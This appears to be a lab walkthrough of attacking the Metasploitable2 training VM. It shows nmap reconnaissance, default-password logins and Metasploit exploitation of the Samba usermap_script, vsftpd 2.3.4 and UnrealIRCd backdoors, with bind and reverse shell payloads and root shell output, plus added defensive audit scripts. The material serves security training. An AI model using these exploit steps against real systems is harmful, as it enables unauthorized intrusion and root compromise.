*Metasploitable2 Target Machine Penetration Test*
*Introduction to Metasploitable2*
The Metasploitable2 virtual machine is a specially built Ubuntu operating system, designed as a testbed for security tools and for demonstrating common vulnerability exploits. Version 2 is available for download and contains more exploitable security vulnerabilities than the previous version. This VM is compatible with VMware, VirtualBox and other virtualization platforms. By default it enables only one network adapter, with NAT and Host-only enabled. This image must never be exposed on a network where it can be attacked.
*Why this target-machine exercise*
Many of the vulnerabilities it contains are fairly old. The purpose of this exercise is to become familiar with penetration testing methods and workflow on a self-built target environment and to consolidate one's own approach to a pentest. For that reason, several tools and techniques will be applied to the same problem here. This is not superfluous: every tool and every method has its strengths and weaknesses, and not depending too heavily on any single tool will make you more confident in real penetration tests later on.
*Environment setup*
Attacker: Kali Linux, IP 192.168.22.137 (the IP depends on your own machine's configuration)
Target: Metasploitable2, IP 192.168.22.134 (the IP depends on your own machine's configuration). Default account/password: msfadmin/msfadmin
Note: Metasploitable2 boots as a normal user by default, which cannot change the IP address; log in as root first, then the IP can be changed.
Root user and network configuration procedure:
1. After logging in as the normal user, enter sudo passwd on the command line
2. Enter the root password twice; when the word "successful" appears it is done
3. Enter su - root on the command line to switch to the root user
4. Edit the network interface settings: vim /etc/network/interfaces
vim /etc/network/interfaces
#This file describes the......
#.....
#The primary network interface
auto eth0
iface eth0 inet dhcp
# (I use automatic IP assignment via DHCP)
#iface eth0 inet static
#address 192.168. ....
#netmask 255.255.255.0
#gateway 192.168. ....
Choose dynamic or static networking according to your needs.
5. Restart networking: /etc/init.d/networking restart
Download link: https://pan.baidu.com/s/1IRYfp-d_qQ9kfcsdK5PNWw
Extraction code: rox3. After unpacking it can be used directly.
Experiment
Information gathering with nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -A -v 192.168.22.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-05 18:08 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating ARP Ping Scan at 18:08
Scanning 192.168.22.134 [1 port]
Completed ARP Ping Scan at 18:08, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.03s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 192.168.22.134 [1000 ports]
Discovered open port 25/tcp on 192.168.22.134
Discovered open port 139/tcp on 192.168.22.134
Discovered open port 80/tcp on 192.168.22.134
Discovered open port 5900/tcp on 192.168.22.134
Discovered open port 21/tcp on 192.168.22.134
Discovered open port 22/tcp on 192.168.22.134
Discovered open port 3306/tcp on 192.168.22.134
Discovered open port 23/tcp on 192.168.22.134
Discovered open port 111/tcp on 192.168.22.134
Discovered open port 53/tcp on 192.168.22.134
Discovered open port 445/tcp on 192.168.22.134
Discovered open port 6667/tcp on 192.168.22.134
Discovered open port 1099/tcp on 192.168.22.134
Discovered open port 8180/tcp on 192.168.22.134
Discovered open port 2049/tcp on 192.168.22.134
Discovered open port 2121/tcp on 192.168.22.134
Discovered open port 5432/tcp on 192.168.22.134
Discovered open port 513/tcp on 192.168.22.134
Discovered open port 514/tcp on 192.168.22.134
Discovered open port 8009/tcp on 192.168.22.134
Discovered open port 6000/tcp on 192.168.22.134
Discovered open port 512/tcp on 192.168.22.134
Discovered open port 1524/tcp on 192.168.22.134
Completed SYN Stealth Scan at 18:08, 0.14s elapsed (1000 total ports)
Initiating Service scan at 18:08
Scanning 23 services on 192.168.22.134
Completed Service scan at 18:08, 11.05s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.22.134
NSE: Script scanning 192.168.22.134.
Initiating NSE at 18:08
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 9.80s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.51s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 192.168.22.134
Host is up (0.00092s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.22.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-02-05T10:08:57+00:00; +14s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40160/udp mountd
| 100005 1,2,3 44798/tcp mountd
| 100021 1,3,4 33803/udp nlockmgr
| 100021 1,3,4 40110/tcp nlockmgr
| 100024 1 39847/udp status
|_ 100024 1 53367/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 18
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, Support41Auth, ConnectWithDatabase, SupportsCompression
| Status: Autocommit
|_ Salt: XE3nQ-*).Lry-pnYRmN|
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-02-05T10:08:57+00:00; +15s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 3:59:11
| source ident: nmap
| source host: 82B328E6.3BA08CB1.FFFA6D49.IP
|_ error: Closing Link: livdnmifj[192.168.22.137] (Quit: livdnmifj)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:DD:32:05 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.163 days (since Fri Feb 5 14:13:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h15m14s, deviation: 2h30m00s, median: 13s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2021-02-05T05:08:48-05:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.92 ms 192.168.22.134
NSE: Script Post-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.98 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
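As an added example (not part of the original post), the following Python script parses the text of an nmap -A report like the one above and flags the services a defender would want to deal with first. The embedded report is a constructed excerpt of the scan output, and the checklist in assess() is an assumed shortlist, not something nmap provides.

```python
"""Triage an nmap -A text report for services that need attention first.

Added example, not part of the original write-up. SAMPLE_REPORT is a
constructed excerpt of the scan output above; the checklist in assess()
is an assumed defender's shortlist, not something nmap provides.
"""
import re

SAMPLE_REPORT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| sslv2:
|   SSLv2 supported
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
1524/tcp open bindshell Metasploitable root shell
5900/tcp open vnc VNC (protocol 3.3)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Services whose credentials or sessions travel unencrypted (assumed list).
PLAINTEXT_AUTH = {"ftp", "telnet", "exec", "login", "shell", "vnc"}


def parse_report(report):
    """Split a report into per-port entries and host-level NSE notes."""
    entries, host_notes = [], []
    in_host_section = False
    for raw in report.splitlines():
        line = raw.strip()
        if line.startswith("Host script results"):
            in_host_section = True
            continue
        m = PORT_LINE.match(line)
        if m and not in_host_section:
            port, proto, state, service, version = m.groups()
            entries.append({"port": int(port), "proto": proto, "state": state,
                            "service": service, "version": version, "notes": []})
        elif line.startswith("|"):
            # NSE script output ('|' / '|_' prefixed) belongs to the preceding
            # port entry, or to the host when inside the host-script section.
            note = line.lstrip("|_ ")
            target = host_notes if in_host_section or not entries else entries[-1]["notes"]
            target.append(note)
    return entries, host_notes


def assess(entries, host_notes):
    """Return {'21/tcp': [...], 'host': [...]} with one finding per rule hit."""
    findings = {}
    for e in entries:
        if e["state"] != "open":
            continue
        notes = " ".join(e["notes"])
        hits = []
        if e["service"] in PLAINTEXT_AUTH:
            hits.append("credentials cross the wire in plaintext")
        if "Anonymous FTP login allowed" in notes:
            hits.append("anonymous FTP enabled")
        if "SSLv2 supported" in notes:
            hits.append("SSLv2 offered")
        if e["service"] == "bindshell" or "root shell" in e["version"]:
            hits.append("unauthenticated shell listener")
        if e["service"] == "ftp" and "vsftpd 2.3.4" in e["version"]:
            hits.append("vsftpd 2.3.4: release with the known backdoor")
        if hits:
            findings[f"{e['port']}/{e['proto']}"] = hits
    if any("message_signing: disabled" in n for n in host_notes):
        findings["host"] = ["SMB signing disabled"]
    return findings


if __name__ == "__main__":
    for scope, hits in assess(*parse_report(SAMPLE_REPORT)).items():
        print(f"{scope:>9}: " + "; ".join(hits))
```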
Weak-password vulnerabilities
Principle: login accounts on a system or database use simple passwords, or the password is the same as the username, so the password is easily obtained by brute force.
Scope: any system or software that logs in with a username/password may have this problem.
1. System weak password: port 22 open (port 22: SSH remote login protocol)
In Kali, enter telnet 192.168.22.134 and log in with login/password msfadmin/msfadmin
This experiment requires telnet to be installed first; the installation steps are as follows
┌──(root💀kali)-[~]
└─# apt-get install telnetd
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列【新】軟體包將被安裝:
telnetd
升級了 0 個軟體包,新安裝了 1 個軟體包,要卸載 0 個軟體包,有 1257 個軟體包未被升級,
需要下載 44.9 kB 的歸檔,
......
......
┌──(root💀kali)-[~]
└─# apt-get install xinetd
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列軟體包是自動安裝的并且現在不需要了:
tcpd
使用'apt autoremove'來卸載它(它們),
下列軟體包將被【卸載】:
inetutils-inetd
下列【新】軟體包將被安裝:
......
......
┌──(root💀kali)-[~]
└─# vim /etc/inetd.conf
...
#daytime stream tcp6 nowait root internal
#time stream tcp6 nowait root internal
#:STANDARD: These are standard services.
After installation the system adds the following line to /etc/inetd.conf; if it is missing, add it manually
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
#:BSD: Shell, login, exec and talk are BSD protocols.
...
┌──(root💀kali)-[~]
└─# vim /etc/xinetd.d/telnet    (this file does not exist on the system yet; it is created when you edit it)
# default: on
# description: The telnet server serves telnet sessions; it uses /
# unencrypted username/password pairs for authentication.
service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
server_args = -h
log_on_failure += USERID
}
┌──(root💀kali)-[~]
└─# /etc/init.d/xinetd restart
Restarting xinetd (via systemctl): xinetd.service.
┌──(root💀kali)-[~]
└─# apt-get install telnet
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列軟體包是自動安裝的并
...
...
Installation finished; the experiment can begin
┌──(root💀kali)-[~]
└─# telnet 192.168.22.134
Trying 192.168.22.134...
Connected to 192.168.22.134.
Escape character is '^]'.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Fri Feb 5 01:39:28 EST 2021 from 192.168.22.129 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ pwd
/home/msfadmin
Successfully logged in to the remote target
2. MySQL weak-password login: port 3306 open (port 3306: the port MySQL listens on)
┌──(root💀kali)-[~]
└─# mysql -h 192.168.22.134
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 26
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]>
Successfully logged in to the target's MySQL database
3. PostgreSQL weak-password login: port 5432 open (port 5432: PostgreSQL database)
┌──(root💀kali)-[~]
└─# psql -h 192.168.22.134 -U postgres
用戶 postgres 的口令:postgres
psql (13.0 (Debian 13.0-4), 服務器 8.3.1)
輸入 "help" 來獲取幫助資訊.
postgres=#
Use \q to quit.
postgres-# \q
Successfully logged in to the target's PostgreSQL database
4. VNC weak-password login: port 5900 open (port 5900: Virtual Network Computing display 0; 5901 is display 1; 5902 is display 2; 5903 is display 3)
┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:    (the password is password)
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
...
...
5. FTP weak-password login
Try brute-forcing it with the brute-force tool that ships with Kali (hydra)
6. Samba MS-RPC shell command injection vulnerability
Cause: unfiltered user input passed in through MS-RPC reaches /bin/sh when an external script defined in smb.conf is invoked, which allows remote command execution.
Affected systems/software:
Xerox WorkCentre Pro
Xerox WorkCentre
VMWare ESX Server
Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI
Trustix Secure Linux
SUSE Linux Enterprise
Sun Solaris
Slackware Linux
RedHat Enterprise
Mandriva Linux
Start Metasploit
┌──(root💀kali)-[~]
└─# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
Search the module database for Samba vulnerabilities: search samba
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
...
...
12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
...
...
Use the usermap_script module: use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
List the payloads with show payloads and choose bind_netcat, i.e. after a successful exploit run a shell with the netcat tool and bind it to a listening port
msf6 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
3 cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping
...
...
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
Check the parameters with show options and set the target IP, port and so on: set RHOST 192.168.22.134
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set rhost 192.168.22.134
rhost => 192.168.22.134
Run exploit/run to obtain a shell
msf6 exploit(multi/samba/usermap_script) > run
[*] Started bind TCP handler against 192.168.22.134:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.22.134:4444) at 2021-02-06 11:50:12 +0800
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
......
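The mitigation side of the Samba issue above is a configuration audit: whether smb.conf hands client-supplied usernames to an external script, and whether the running Samba is a release still affected. The following Python is an added example, not part of the original post; the two smb.conf texts are constructed, and the affected version range (3.0.0 through 3.0.25rc3) is taken from the Samba project's advisory rather than from this page.

```python
"""Audit an smb.conf for the 'username map script' directive.

Added example, not from the write-up. VULNERABLE_CONF and HARDENED_CONF are
constructed; the affected range 3.0.0 .. 3.0.25rc3 comes from the Samba
project's advisory and is the only outside fact assumed here.
"""
import re

VULNERABLE_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   username map script = /etc/samba/scripts/mapusers.sh
   log file = /var/log/samba/log.%m

[tmp]
   path = /tmp
   writeable = yes
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; username map script removed; a static mapping file needs no shell
   username map = /etc/samba/smbusers
   log file = /var/log/samba/log.%m
"""


def parse_smb_conf(text):
    """Return {section: {key: value}}, ignoring '#' and ';' comment lines."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            # Samba keys are case-insensitive and tolerate extra inner spaces
            conf[section][" ".join(key.split()).lower()] = value.strip()
    return conf


def version_in_affected_range(version):
    """True for Samba 3.0.0 .. 3.0.25rc3 (assumed range, see module docstring)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(rc(\d+))?", version)
    if not m:
        return False
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    rc = int(m.group(5)) if m.group(5) else None
    if (major, minor) != (3, 0):
        return False
    if patch < 25:
        return True
    return patch == 25 and rc is not None and rc <= 3


def audit(conf_text, samba_version):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_smb_conf(conf_text)
    findings = []
    script = conf.get("global", {}).get("username map script")
    if script:
        findings.append(f"'username map script' is set ({script}): "
                        "client-supplied usernames are handed to an external script via the shell")
    if version_in_affected_range(samba_version):
        findings.append(f"Samba {samba_version} is in the affected range; upgrade")
    return findings


if __name__ == "__main__":
    # The version string is the one nmap reported for port 445 above.
    for f in audit(VULNERABLE_CONF, "3.0.20-Debian"):
        print("FINDING:", f)
    print("hardened:", audit(HARDENED_CONF, "3.6.3") or "clean")
```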
7. vsftpd backdoor in the source package: port 21 is open and the vsftpd version is 2.3.4
Principle: a specific version of the vsftpd server program had malicious code planted in it; when the username ends with ":)", the server starts listening on port 6200 and arbitrary code can be executed
Affected software: vsftpd server v2.3.4
Start Metasploit and search the module database for vsftpd: search vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
Use the module: use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
Check the parameters to set with show options; only the target IP is needed: set RHOST 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.22.134:21 - The port used by the backdoor bind listener is already open
[+] 192.168.22.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.22.134:6200) at 2021-02-06 12:09:20 +0800
whoami
root
Successfully obtained a shell on the target
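From the defender's side, the two observable signs of this backdoor are the ":)" suffix on a USER command and a new listener on tcp/6200. The following Python is an added example, not part of the original post; the FTP command lines stand in for what a capture or proxy log would show, and the ss -ltn text stands in for a snapshot of listening sockets; both are constructed.

```python
"""Spot the vsftpd 2.3.4 backdoor trigger and its side effect.

Added example, not from the original write-up. FTP_COMMANDS and SS_OUTPUT
are constructed inputs: FTP control-channel commands as a capture or proxy
log would show them, and `ss -ltn` output listing TCP listeners.
"""
import re

FTP_COMMANDS = """\
USER anonymous
PASS guest@example.org
QUIT
USER bob:)
PASS x
USER alice
"""

SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:21           0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       1       0.0.0.0:6200         0.0.0.0:*
"""

BACKDOOR_PORT = 6200  # the port the backdoored vsftpd opens, as described above


def trigger_usernames(commands):
    """Return the USER arguments that carry the ':)' trigger suffix."""
    hits = []
    for line in commands.splitlines():
        m = re.match(r"^USER\s+(.*)$", line.strip(), re.IGNORECASE)
        if m and m.group(1).rstrip().endswith(":)"):
            hits.append(m.group(1).rstrip())
    return hits


def listening_ports(ss_text):
    """Parse `ss -ltn` output into the set of local TCP ports in LISTEN state."""
    ports = set()
    for line in ss_text.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            # Local Address:Port is the 4th column; port follows the last ':'
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports


def assess(commands, ss_text):
    """Combine both signals into a list of findings (empty = nothing seen)."""
    findings = []
    for user in trigger_usernames(commands):
        findings.append(f"FTP USER with backdoor trigger suffix: {user!r}")
    if BACKDOOR_PORT in listening_ports(ss_text):
        findings.append(f"tcp/{BACKDOOR_PORT} is listening: backdoor shell may be active")
    return findings


if __name__ == "__main__":
    for f in assess(FTP_COMMANDS, SS_OUTPUT):
        print("FINDING:", f)
```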
8. UnrealIRCd backdoor vulnerability
Principle: the UnrealIRCd distributed through certain mirror sites between November 2009 and June 2010 contained externally introduced malicious code in the DEBUG3_DOLOG_SYSTEM macro, allowing a remote attacker to execute arbitrary code.
Affected systems/software: Unreal UnrealIRCd 3.2.8.1
Enter the command "search unreal ircd" in the terminal to search for tools and payloads related to ircd.
msf6 > search unreal ircd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Enter the command "use exploit/unix/irc/unreal_ircd_3281_backdoor" in the terminal to enable the exploit module.
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
Enter "show options" in the terminal to see the items that need to be set; "yes" marks the parameters that must be filled in.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
Next, enter "set RHOST [target IP]" in the terminal to set the target host's IP address
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.22.134:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
The message says no payload was selected, so set one manually
Set the payload and lhost (the attacker's IP)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 192.168.22.137
lhost => 192.168.22.137
Launch the attack with exploit/run
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
